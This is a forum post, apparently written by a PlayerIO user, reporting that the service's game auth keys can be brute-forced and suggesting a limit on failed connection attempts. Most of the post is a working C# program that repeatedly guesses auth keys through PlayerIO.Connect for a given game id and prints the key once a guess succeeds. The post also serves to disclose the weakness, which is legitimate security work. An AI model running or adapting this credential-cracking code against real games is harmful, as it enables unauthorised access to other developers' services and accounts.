That makes playerio very vulnerable for bruteforcing or dictionary attacts
The solution to the problem would probably be setting a limit on how many times a program can connect to the same game with an incorrect auth key in a certain amount of time.
I made a simple c# app only 55 lines of code that can crack an auth key (if the auth key isn't "") and if the connection type is public
- Code: Select all
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using PlayerIOClient;
using BruteForcerHelper;
namespace PlayerIO_password_cracker
{
class Program
{
static void Main(string[] args)
{
start:
BruteForceHelper bruteforcer = new BruteForceHelper();
Console.WriteLine("Enter playerio gamekey to crack");
string gameId = Console.ReadLine();
retry:
string attempt = bruteforcer.next();
Console.WriteLine("Trying: " + attempt + " on game id: " + gameId);
try
{
Client client = PlayerIO.Connect(gameId, "public", "cracker", PlayerIO.CalcAuth("cracker", attempt));
}
catch (PlayerIOError e)
{
if (e.Message == "Unknown game id: " + gameId)
{
Console.WriteLine("Wrong game id");
goto start;
}
else if (e.Message == "The auth given is invalid or malformatted")
{
goto retry;
}
Console.WriteLine("Unknown problem occured");
Console.WriteLine(e.Message);
Console.ReadLine();
goto start;
}
Console.WriteLine("Success, auth cracked");
Console.WriteLine("The authensication to the game is: "+ attempt);
Console.ReadLine();
}
}
}